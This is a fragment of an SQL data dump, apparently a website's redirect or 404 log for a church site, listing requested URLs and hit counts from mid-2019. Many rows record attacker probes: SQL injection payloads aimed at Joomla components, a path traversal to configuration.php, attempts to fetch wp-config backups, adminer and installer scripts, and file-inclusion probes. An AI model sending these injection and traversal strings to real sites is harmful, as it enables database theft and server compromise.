(11097, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/04/34/', NULL, '', '', 1, 0, '2019-07-08 04:44:07', '0000-00-00 00:00:00', 301),
(11098, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/05/34/', NULL, '', '', 1, 0, '2019-07-08 04:44:16', '0000-00-00 00:00:00', 301),
(11099, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/06/34/', NULL, '', '', 1, 0, '2019-07-08 04:44:27', '0000-00-00 00:00:00', 301),
(11100, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/07/34/', NULL, '', '', 1, 0, '2019-07-08 04:44:35', '0000-00-00 00:00:00', 301),
(11101, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/08/34/', NULL, '', '', 1, 0, '2019-07-08 04:44:43', '0000-00-00 00:00:00', 301),
(11102, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/09/34/', NULL, '', '', 1, 0, '2019-07-08 04:44:50', '0000-00-00 00:00:00', 301),
(11103, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/17/34/', NULL, '', '', 1, 0, '2019-07-08 04:44:57', '0000-00-00 00:00:00', 301),
(11104, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/19/34/', NULL, '', '', 1, 0, '2019-07-08 04:45:07', '0000-00-00 00:00:00', 301),
(11105, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/20/34/', NULL, '', '', 1, 0, '2019-07-08 04:45:13', '0000-00-00 00:00:00', 301),
(11106, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/07/15/34/', NULL, '', '', 1, 0, '2019-07-08 04:45:20', '0000-00-00 00:00:00', 301),
(11107, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2003/12/07/34/', NULL, '', '', 1, 0, '2019-07-08 04:45:27', '0000-00-00 00:00:00', 301),
(11108, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2011/02/19/34/', NULL, '', '', 1, 0, '2019-07-08 04:45:36', '0000-00-00 00:00:00', 301),
(11109, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2011/02/20/34/', NULL, '', '', 1, 0, '2019-07-08 04:45:44', '0000-00-00 00:00:00', 301),
(11110, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2011/02/21/34/', NULL, '', '', 1, 0, '2019-07-08 04:45:53', '0000-00-00 00:00:00', 301),
(11111, 'https://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/20-welcome/', NULL, '', '', 1, 0, '2019-07-08 04:46:00', '0000-00-00 00:00:00', 301),
(11112, 'https://www.lifeoasisinternationalchurch.org/index.php/18-loic/50-young-achievers/', NULL, '', '', 1, 0, '2019-07-08 04:46:07', '0000-00-00 00:00:00', 301),
(11113, 'https://www.lifeoasisinternationalchurch.org/autodiscover', NULL, '', '', 2, 0, '2019-07-08 05:30:41', '0000-00-00 00:00:00', 301),
(11114, 'https://lifeoasisinternationalchurch.org/asom2018/wp-admin', NULL, '', '', 1, 0, '2019-07-08 18:00:17', '0000-00-00 00:00:00', 301),
(11115, 'https://lifeoasisinternationalchurch.org/autodiscover', NULL, '', '', 3, 0, '2019-07-08 19:39:26', '0000-00-00 00:00:00', 301),
(11116, 'https://lifeoasisinternationalchurch.org/wow2019/', NULL, '', '', 4, 0, '2019-07-08 21:47:51', '0000-00-00 00:00:00', 301),
(11117, 'https://lifeoasisinternationalchurch.org/wow2019/wp-admin/admin-ajax.php', NULL, 'https://lifeoasisinternationalchurch.org/wow2019/wp-admin/admin.php?page=espresso_events&action=create_new&create_new_nonce=9b94cda07c', '', 1, 0, '2019-07-09 04:46:36', '0000-00-00 00:00:00', 301),
(11118, 'https://www.lifeoasisinternationalchurch.org/tithe-offering', NULL, '', '', 1, 0, '2019-07-09 11:56:00', '0000-00-00 00:00:00', 301),
(11119, 'https://lifeoasisinternationalchurch.org/wow2019', NULL, '', '', 4, 0, '2019-07-10 21:57:25', '0000-00-00 00:00:00', 301),
(11120, 'https://www.lifeoasisinternationalchurch.org/58-prophetic-words-for-day-6', NULL, '', '', 1, 0, '2019-07-11 08:41:04', '0000-00-00 00:00:00', 301),
(11121, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermons/0/0?limitstart=0', NULL, '', '', 3, 0, '2019-07-11 20:09:10', '0000-00-00 00:00:00', 301),
(11122, 'https://www.lifeoasisinternationalchurch.org/component/content/category/12-sample-content', NULL, '', '', 6, 0, '2019-07-12 01:29:51', '0000-00-00 00:00:00', 301),
(11123, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/17-entering-into-winning-position-5', NULL, '', '', 2, 0, '2019-07-12 04:09:00', '0000-00-00 00:00:00', 301),
(11124, 'https://142.4.21.132/dns-query', NULL, '', '', 1, 0, '2019-07-12 18:41:46', '0000-00-00 00:00:00', 301),
(11125, 'https://www.lifeoasisinternationalchurch.org/trainings', NULL, '', '', 1, 0, '2019-07-12 21:09:17', '0000-00-00 00:00:00', 301),
(11126, 'https://lifeoasisinternationalchurch.org/pastoraltraining', NULL, '', '', 1, 0, '2019-07-12 21:23:12', '0000-00-00 00:00:00', 301),
(11127, 'https://142.4.21.132/admin/connection/', NULL, '', '', 1, 0, '2019-07-17 13:36:44', '0000-00-00 00:00:00', 301),
(11128, 'https://www.lifeoasisinternationalchurch.org/resource/blog/item/62-the-divinely-assisted-life-part-2', NULL, '', '', 1, 0, '2019-07-17 16:44:52', '0000-00-00 00:00:00', 301),
(11129, 'https://lifeoasisinternationalchurch.org/streaming/p,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,', NULL, '', '', 2, 0, '2019-07-19 23:17:53', '0000-00-00 00:00:00', 301),
(11130, 'https://lifeoasisinternationalchurch.org/private/live-streaming', NULL, '', '', 1, 0, '2019-07-20 00:06:09', '0000-00-00 00:00:00', 301),
(11131, 'https://142.4.21.132/_vti_bin/wsts/', NULL, '', '', 1, 0, '2019-07-20 00:52:51', '0000-00-00 00:00:00', 301),
(11132, 'https://lifeoasisinternationalchurch.org/soc2019/', NULL, '', '', 1, 0, '2019-07-20 02:49:12', '0000-00-00 00:00:00', 301),
(11133, 'https://www.lifeoasisinternationalchurch.org/soc2019/', NULL, '', '', 1, 0, '2019-07-20 02:49:18', '0000-00-00 00:00:00', 301),
(11134, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermons?sermon_cat=21', NULL, '', '', 10, 0, '2019-07-20 04:12:58', '0000-00-00 00:00:00', 301),
(11135, 'https://142.4.21.132/nmaplowercheck1563633390', NULL, '', '', 1, 0, '2019-07-20 14:36:29', '0000-00-00 00:00:00', 301),
(11136, 'https://mail.lifeoasisinternationalchurch.org/soc2019/', NULL, '', '', 1, 0, '2019-07-21 04:29:27', '0000-00-00 00:00:00', 301),
(11137, 'https://lifeoasisinternationalchurch.org/?itemid=1000', NULL, 'https://www.google.com', '', 1, 0, '2019-07-21 07:14:09', '0000-00-00 00:00:00', 301),
(11138, 'https://www.lifeoasisinternationalchurch.org/about-us/ordained', NULL, 'https://www.google.com', '', 64, 0, '2019-07-21 08:19:39', '0000-00-00 00:00:00', 301),
(11139, 'https://www.lifeoasisinternationalchurch.org/#page', NULL, 'https://www.google.com', '', 1, 0, '2019-07-21 09:54:34', '0000-00-00 00:00:00', 301),
(11140, 'https://www.lifeoasisinternationalchurch.org/wow2019', NULL, '', '', 1, 0, '2019-07-21 10:38:14', '0000-00-00 00:00:00', 301),
(11141, 'https://www.lifeoasisinternationalchurch.org/dashboard', NULL, '', '', 1, 0, '2019-07-21 10:41:43', '0000-00-00 00:00:00', 301),
(11142, 'https://lifeoasisinternationalchurch.org/wow19', NULL, '', '', 1, 0, '2019-07-21 10:49:09', '0000-00-00 00:00:00', 301),
(11143, 'https://lifeoasisinternationalchurch.org/web/', NULL, '', '', 3, 0, '2019-07-21 16:54:45', '0000-00-00 00:00:00', 301),
(11144, 'https://lifeoasisinternationalchurch.org/main/', NULL, '', '', 3, 0, '2019-07-21 16:54:46', '0000-00-00 00:00:00', 301),
(11145, 'https://lifeoasisinternationalchurch.org/demo/', NULL, '', '', 3, 0, '2019-07-21 16:54:48', '0000-00-00 00:00:00', 301),
(11146, 'https://lifeoasisinternationalchurch.org/temp/', NULL, '', '', 3, 0, '2019-07-21 16:54:52', '0000-00-00 00:00:00', 301),
(11147, 'https://lifeoasisinternationalchurch.org/cms/', NULL, '', '', 3, 0, '2019-07-21 16:54:53', '0000-00-00 00:00:00', 301),
(11148, 'https://lifeoasisinternationalchurch.org/v1/', NULL, '', '', 2, 0, '2019-07-21 16:54:53', '0000-00-00 00:00:00', 301),
(11149, 'https://lifeoasisinternationalchurch.org/v2/', NULL, '', '', 2, 0, '2019-07-21 16:54:54', '0000-00-00 00:00:00', 301),
(11150, 'https://lifeoasisinternationalchurch.org/about-us/ordained', NULL, 'https://www.google.com/', '', 105, 0, '2019-07-22 19:19:54', '0000-00-00 00:00:00', 301),
(11151, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20190729\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"s_h-a9o2iccgm2ixxczwiz7i3bodwdnqldi-te7xfktv-nnja7mq0qydf4yw8g4fqaiaimmip1gzttxw2pwylf8o4dw3zlvloaruopaaq3395kpprsnmtrv5hvswxupdfuexampyay-4mcos4hdfakbzmokxtnmj\",\"basedto\":{\"check_code\":\"cbf0369a93e43d80045fb62e688d57a4\",\"device_no\":\"xtfbqpovlqmzmmayn7zzhsgz\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190724203906\",\"user_name\":\"\",\"version_no\":\"4.2.10\"}}]&ts=1563971946772&sign=', NULL, '', '', 1, 0, '2019-07-24 12:39:06', '0000-00-00 00:00:00', 301),
(11152, 'https://www.lifeoasisinternationalchurch.org/resources/live-streamingh', NULL, '', '', 1, 0, '2019-07-24 12:52:51', '0000-00-00 00:00:00', 301),
(11153, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaminghee', NULL, '', '', 1, 0, '2019-07-24 12:52:54', '0000-00-00 00:00:00', 301),
(11154, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaminghe', NULL, '', '', 1, 0, '2019-07-24 12:52:54', '0000-00-00 00:00:00', 301),
(11155, 'https://kyfw.12306.cn/otn/leftticket/query?leftticketdto.train_date=2019-07-30&leftticketdto.from_station=szh&leftticketdto.to_station=csq&purpose_codes=adult', NULL, 'https://kyfw.12306.cn/otn/leftTicket/init', '', 1, 0, '2019-07-25 10:31:33', '0000-00-00 00:00:00', 301),
(11156, 'https://lifeoasisinternationalchurch.org/index.php/component/user/?task=registe', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-07-25 14:52:15', '0000-00-00 00:00:00', 301),
(11157, 'https://www.lifeoasisinternationalchurch.org/wp/', NULL, '', '', 8, 0, '2019-07-27 05:32:36', '0000-00-00 00:00:00', 301),
(11158, 'https://www.lifeoasisinternationalchurch.org/old/', NULL, '', '', 8, 0, '2019-07-27 05:32:45', '0000-00-00 00:00:00', 301),
(11159, 'https://www.lifeoasisinternationalchurch.org/main/', NULL, '', '', 8, 0, '2019-07-27 05:32:55', '0000-00-00 00:00:00', 301),
(11160, 'https://www.lifeoasisinternationalchurch.org/demo/', NULL, '', '', 8, 0, '2019-07-27 05:33:09', '0000-00-00 00:00:00', 301),
(11161, 'https://www.lifeoasisinternationalchurch.org/cms/', NULL, '', '', 8, 0, '2019-07-27 05:33:19', '0000-00-00 00:00:00', 301),
(11162, 'https://www.lifeoasisinternationalchurch.org/dev/', NULL, '', '', 8, 0, '2019-07-27 05:33:24', '0000-00-00 00:00:00', 301),
(11163, 'https://www.lifeoasisinternationalchurch.org/temp/', NULL, '', '', 8, 0, '2019-07-27 05:33:33', '0000-00-00 00:00:00', 301),
(11164, 'https://lifeoasisinternationalchurch.org/adminer-4.2.5.php', NULL, '', '', 1, 0, '2019-07-27 06:47:54', '0000-00-00 00:00:00', 301),
(11165, 'https://lifeoasisinternationalchurch.org/re', NULL, '', '', 1, 0, '2019-07-28 08:06:36', '0000-00-00 00:00:00', 301),
(11166, 'https://lifeoasisinternationalchurch.org/reso', NULL, '', '', 1, 0, '2019-07-28 08:06:38', '0000-00-00 00:00:00', 301),
(11167, 'https://lifeoasisinternationalchurch.org/resour', NULL, '', '', 1, 0, '2019-07-28 08:06:41', '0000-00-00 00:00:00', 301),
(11168, 'https://lifeoasisinternationalchurch.org/resources/live-', NULL, '', '', 1, 0, '2019-07-28 08:06:52', '0000-00-00 00:00:00', 301),
(11169, 'https://lifeoasisinternationalchurch.org/#page', NULL, 'https://www.google.com', '', 2, 0, '2019-07-29 01:02:39', '0000-00-00 00:00:00', 301),
(11170, 'https://www.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last%20days', NULL, 'https://www.google.com', '', 4, 0, '2019-07-29 02:22:51', '0000-00-00 00:00:00', 301),
(11171, 'https://www.lifeoasisinternationalchurch.org/streaming\n', NULL, '', '', 1, 0, '2019-07-29 14:53:47', '0000-00-00 00:00:00', 301),
(11172, 'https://lifeoasisinternationalchurch.org/wow2019/installer.php', NULL, '', '', 3, 0, '2019-07-29 20:54:24', '0000-00-00 00:00:00', 301),
(11173, 'https://lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=pnfhlvmmy9a', NULL, 'https://lifeoasisinternationalchurch.org/private', '', 2, 0, '2019-07-29 22:48:50', '0000-00-00 00:00:00', 301),
(11174, 'https://www.lifeoasisinternationalchurch.org/16-prayer-a-fasting-day-7', NULL, '', '', 5, 0, '2019-07-30 05:43:27', '0000-00-00 00:00:00', 301),
(11175, 'https://lifeoasisinternationalchurch.org/component/k2/ite', NULL, '', '', 1, 0, '2019-07-31 05:30:17', '0000-00-00 00:00:00', 301),
(11176, 'https://lifeoasisinternationalchurch.org/componen', NULL, '', '', 1, 0, '2019-07-31 05:30:32', '0000-00-00 00:00:00', 301),
(11177, 'https://lifeoasisinternationalchurch.org/youtun', NULL, '', '', 1, 0, '2019-07-31 23:48:53', '0000-00-00 00:00:00', 301),
(11178, 'https://lifeoasisinternationalchurch.org/resources/live-streamingli', NULL, '', '', 1, 0, '2019-07-31 23:57:32', '0000-00-00 00:00:00', 301),
(11179, 'https://lifeoasisinternationalchurch.org/wow2019/wp-admin', NULL, '', '', 1, 0, '2019-08-01 11:09:09', '0000-00-00 00:00:00', 301),
(11180, 'https://www.lifeoasisinternationalchurch.org/businesssummit', NULL, '', '', 1, 0, '2019-08-01 22:21:53', '0000-00-00 00:00:00', 301),
(11181, 'https://lifeoasisinternationalchurch.org/php1nf0.php', NULL, '', '', 1, 0, '2019-08-02 13:10:13', '0000-00-00 00:00:00', 301),
(11182, 'https://lifeoasisinternationalchurch.org/t.php', NULL, '', '', 1, 0, '2019-08-02 13:10:25', '0000-00-00 00:00:00', 301),
(11183, 'https://www.lifeoasisinternationalchurch.org/resouurceus/live-streaming', NULL, '', '', 1, 0, '2019-08-03 05:30:32', '0000-00-00 00:00:00', 301),
(11184, 'https://www.lifeoasisinternationalchurch.org/resources/lprivate-streaming', NULL, '', '', 2, 0, '2019-08-03 13:31:54', '0000-00-00 00:00:00', 301),
(11185, 'https://www.lifeoasisinternationalchurch.org/private screaming', NULL, '', '', 1, 0, '2019-08-03 16:18:20', '0000-00-00 00:00:00', 301),
(11186, 'https://lifeoasisinternationalchurch.org/private-streaming1', NULL, '', '', 1, 0, '2019-08-03 17:34:37', '0000-00-00 00:00:00', 301),
(11187, 'https://lifeoasisinternationalchurch.org/pivate streaming', NULL, '', '', 1, 0, '2019-08-03 17:35:17', '0000-00-00 00:00:00', 301),
(11188, 'https://lifeoasisinternationalchurch.org/pivate', NULL, '', '', 1, 0, '2019-08-03 17:35:55', '0000-00-00 00:00:00', 301),
(11189, 'https://www.lifeoasisinternationalchurch.org/life stream', NULL, '', '', 1, 0, '2019-08-04 11:55:33', '0000-00-00 00:00:00', 301),
(11190, 'https://eagle.lifeoasisinternationalchurch.org/about-us/ordained', NULL, '', '', 3, 0, '2019-08-04 19:28:20', '0000-00-00 00:00:00', 301),
(11191, 'https://www.lifeoasisinternationalchurch.org/prayer/55-day1', NULL, '', '', 2, 0, '2019-08-05 22:41:53', '0000-00-00 00:00:00', 301),
(11192, 'https://lifeoasisinternationalchurch.org/cgi-bin/cgi-bin1.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:00', '0000-00-00 00:00:00', 301),
(11193, 'https://lifeoasisinternationalchurch.org/css/css.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:00', '0000-00-00 00:00:00', 301),
(11194, 'https://lifeoasisinternationalchurch.org/.well-known/newsrsss.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:01', '0000-00-00 00:00:00', 301),
(11195, 'https://lifeoasisinternationalchurch.org/newsrsss.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:07', '0000-00-00 00:00:00', 301),
(11196, 'https://lifeoasisinternationalchurch.org/newsslide.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:14', '0000-00-00 00:00:00', 301),
(11197, 'https://lifeoasisinternationalchurch.org/-known.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:25', '0000-00-00 00:00:00', 301),
(11198, 'https://lifeoasisinternationalchurch.org/php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:31', '0000-00-00 00:00:00', 301),
(11199, 'https://lifeoasisinternationalchurch.org/js/newsslide.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:43', '0000-00-00 00:00:00', 301),
(11200, 'https://lifeoasisinternationalchurch.org/fonts/fonts.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:24:49', '0000-00-00 00:00:00', 301),
(11201, 'https://lifeoasisinternationalchurch.org/cgi-bin/feal11.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:25:08', '0000-00-00 00:00:00', 301),
(11202, 'https://lifeoasisinternationalchurch.org/.well-known/feal.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:25:09', '0000-00-00 00:00:00', 301),
(11203, 'https://lifeoasisinternationalchurch.org/cgi-bin/cgi-bin.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:25:20', '0000-00-00 00:00:00', 301),
(11204, 'https://lifeoasisinternationalchurch.org/cgi-bin/feal.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:25:25', '0000-00-00 00:00:00', 301),
(11205, 'https://lifeoasisinternationalchurch.org/js/feal.php?name=htp://example.com&file=test.txt', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2019-08-08 11:27:36', '0000-00-00 00:00:00', 301),
(11206, 'https://lifeoasisinternationalchurch.org/wow2019/wp-admin/', NULL, '', '', 1, 0, '2019-08-08 16:40:07', '0000-00-00 00:00:00', 301),
(11207, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.queryleftticket&requestdata=[{\"train_date\":\"20190814\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"xznrcqg633nywilcmcdotr_eotlflxjpph6g9jgjwnfpliyod-3lc3wqnmhvhy2k43wd5r_mcsafdkjcnoo1ulx1b70p-2irsadhdmbhva4mki_xhvzrpf2eicdjogjj0ybk-uc1cdnik6dvqhvpm8rl2k2ko28l\",\"basedto\":{\"check_code\":\"405933b271d2d146fa54f56cb9b2eb19\",\"device_no\":\"xuscj3lculmzmc2twkavl2le\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190809031246\",\"user_name\":\"\",\"version_no\":\"4.2.10\"}}]&ts=1565291566350&sign=', NULL, '', '', 1, 0, '2019-08-08 19:12:45', '0000-00-00 00:00:00', 301),
(11208, 'https://www.lifeoasisinternationalchurch.org/y', NULL, '', '', 1, 0, '2019-08-08 21:52:30', '0000-00-00 00:00:00', 301),
(11209, 'https://lifeoasisinternationalchurch.org/stresming', NULL, '', '', 1, 0, '2019-08-09 12:43:07', '0000-00-00 00:00:00', 301),
(11210, 'https://142.4.21.132/index.php?option=com_vnmshop&catid=113 limit 0,1 union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,md5(3.14),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null', NULL, '', '', 1, 0, '2019-08-09 17:13:26', '0000-00-00 00:00:00', 301),
(11211, 'https://142.4.21.132/index.php/component/myproject/verayari\'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),md5(1))) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \'\'=\'', NULL, '', '', 1, 0, '2019-08-09 17:25:59', '0000-00-00 00:00:00', 301),
(11212, 'https://142.4.21.132/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1  /*!05555procedure*/ /*!05555analyse*/ (extractvalue(0,/*!05555concat*/(0x27,md5(5),0x3a,@@version)),0)-- -', NULL, '', '', 1, 0, '2019-08-09 17:26:46', '0000-00-00 00:00:00', 301),
(11213, 'https://142.4.21.132/index.php?option=com_nge&view=config&plname=\"  /*!07777procedure*/ /*!07777analyse*/ (extractvalue(00,/*!07777concat*/(0x27,md5(5),0x3a,@@version)),0)-- -', NULL, '', '', 1, 0, '2019-08-09 18:06:29', '0000-00-00 00:00:00', 301),
(11214, 'https://142.4.21.132/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920\') or 1 group by concat(0x71786a7a71,(mid((ifnull(cast(md5(721) as char),0x20)) ,1,54)),0x716b6b7a71,floor(rand(0)*2)) having min(0)#', NULL, '', '', 1, 0, '2019-08-09 18:07:12', '0000-00-00 00:00:00', 301),
(11215, 'https://142.4.21.132/jamautos/en/vehicles/passenger-cars/used-cars-makes/index.php?option=com_expautospro&view=expmake&format=ajax&tmpl=component&task=expshortlist&expval=1&expid=210\'&lang=en', NULL, '', '', 1, 0, '2019-08-09 18:08:24', '0000-00-00 00:00:00', 301),
(11216, 'https://142.4.21.132/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=', NULL, '', '', 1, 0, '2019-08-09 18:08:41', '0000-00-00 00:00:00', 301),
(11217, 'https://142.4.21.132/components/com_docman/dl2.php?archive=0&file=li4vy29uzmlndxjhdglvbi5waha=', NULL, '', '', 1, 0, '2019-08-09 18:08:58', '0000-00-00 00:00:00', 301),
(11218, 'https://142.4.21.132/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=-3094 union all select null,null,concat(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),null,null,null,null,null,null,null-- ccqb&tmpl=newsletter', NULL, '', '', 1, 0, '2019-08-09 18:10:08', '0000-00-00 00:00:00', 301),
(11219, 'https://142.4.21.132/index.php?option=com_jevideogallery&view=category&id=99 and(select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e,md5(5))) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)', NULL, '', '', 1, 0, '2019-08-09 18:25:44', '0000-00-00 00:00:00', 301),
(11220, 'https://142.4.21.132/index.php?option=com_bookpro&view=popup&visatype=259999 and(select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e,md5(5))) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)', NULL, '', '', 1, 0, '2019-08-09 18:26:06', '0000-00-00 00:00:00', 301),
(11221, 'https://142.4.21.132/index.php/en/component/jequestions/?view=tags&an=-verayari\' /*!06666union*/ /*!06666select*/ 1,md5(5),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -', NULL, '', '', 1, 0, '2019-08-09 18:26:36', '0000-00-00 00:00:00', 301),
(11222, 'https://142.4.21.132/index.php?option=com_userbench&view=detail&userid=1 and(select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e,md5(5))) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)', NULL, '', '', 1, 0, '2019-08-09 18:26:54', '0000-00-00 00:00:00', 301),
(11223, 'https://142.4.21.132/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php', NULL, '', '', 1, 0, '2019-08-09 18:50:39', '0000-00-00 00:00:00', 301),
(11224, 'https://142.4.21.132/index.php?option=com_departments&id=-1 union select 1,md5(700),3,4,5,6,7,8--', NULL, '', '', 1, 0, '2019-08-09 18:51:04', '0000-00-00 00:00:00', 301),
(11225, 'https://142.4.21.132/requested.html', NULL, '', '', 1, 0, '2019-08-09 19:08:24', '0000-00-00 00:00:00', 301),
(11226, 'https://lifeoasisinternationalchurch.org/wp-config', NULL, '', '', 1, 0, '2019-08-11 05:21:57', '0000-00-00 00:00:00', 301),
(11227, 'https://lifeoasisinternationalchurch.org/wp-config-backup', NULL, '', '', 1, 0, '2019-08-11 05:22:07', '0000-00-00 00:00:00', 301),
(11228, 'https://lifeoasisinternationalchurch.org/wp-config ', NULL, '', '', 1, 0, '2019-08-11 05:22:17', '0000-00-00 00:00:00', 301),
(11229, 'https://lifeoasisinternationalchurch.org/config-backup', NULL, '', '', 1, 0, '2019-08-11 05:27:56', '0000-00-00 00:00:00', 301),
(11230, 'https://www.lifeoasisinternationalchurch.org//?itemid=1000', NULL, '', '', 4, 0, '2019-08-11 05:54:08', '0000-00-00 00:00:00', 301),
(11231, 'https://www.lifeoasisinternationalchurch.org//admin', NULL, '', '', 4, 0, '2019-08-11 05:54:10', '0000-00-00 00:00:00', 301),
(11232, 'https://www.lifeoasisinternationalchurch.org/streamingif', NULL, '', '', 1, 0, '2019-08-11 06:35:43', '0000-00-00 00:00:00', 301),
(11233, 'https://www.lifeoasisinternationalchurch.org/_async/asyncresponseservice', NULL, 'https://www.lifeoasisinternationalchurch.org/_async/AsyncResponseService', '', 1, 0, '2019-08-12 20:05:08', '0000-00-00 00:00:00', 301),
(11234, 'https://142.4.21.132/agentui.php/', NULL, '', '', 1, 0, '2019-08-13 05:20:51', '0000-00-00 00:00:00', 301),
(11235, 'https://lifeoasisinternationalchurch.org/_async/asyncresponseservice', NULL, 'https://lifeoasisinternationalchurch.org/_async/AsyncResponseService', '', 1, 0, '2019-08-13 11:31:15', '0000-00-00 00:00:00', 301),
(11236, 'https://lifeoasisinternationalchurch.org/component/k2/item/null', NULL, '', '', 3, 0, '2019-08-13 19:36:20', '0000-00-00 00:00:00', 301),
(11237, 'https://lifeoasisinternationalchurch.org/dev/rss/order/new', NULL, '', '', 4, 0, '2019-08-14 07:25:16', '0000-00-00 00:00:00', 301),
(11238, 'https://lifeoasisinternationalchurch.org/dev/rss/catalog/notifystock', NULL, '', '', 4, 0, '2019-08-14 07:25:17', '0000-00-00 00:00:00', 301),
(11239, 'https://lifeoasisinternationalchurch.org/dev/rss/catalog/review', NULL, '', '', 4, 0, '2019-08-14 07:25:18', '0000-00-00 00:00:00', 301),
(11240, 'https://lifeoasisinternationalchurch.org/old/rss/order/new', NULL, '', '', 4, 0, '2019-08-14 07:25:19', '0000-00-00 00:00:00', 301),
(11241, 'https://lifeoasisinternationalchurch.org/old/rss/catalog/notifystock', NULL, '', '', 4, 0, '2019-08-14 07:25:20', '0000-00-00 00:00:00', 301),
(11242, 'https://lifeoasisinternationalchurch.org/old/rss/catalog/review', NULL, '', '', 4, 0, '2019-08-14 07:25:21', '0000-00-00 00:00:00', 301),
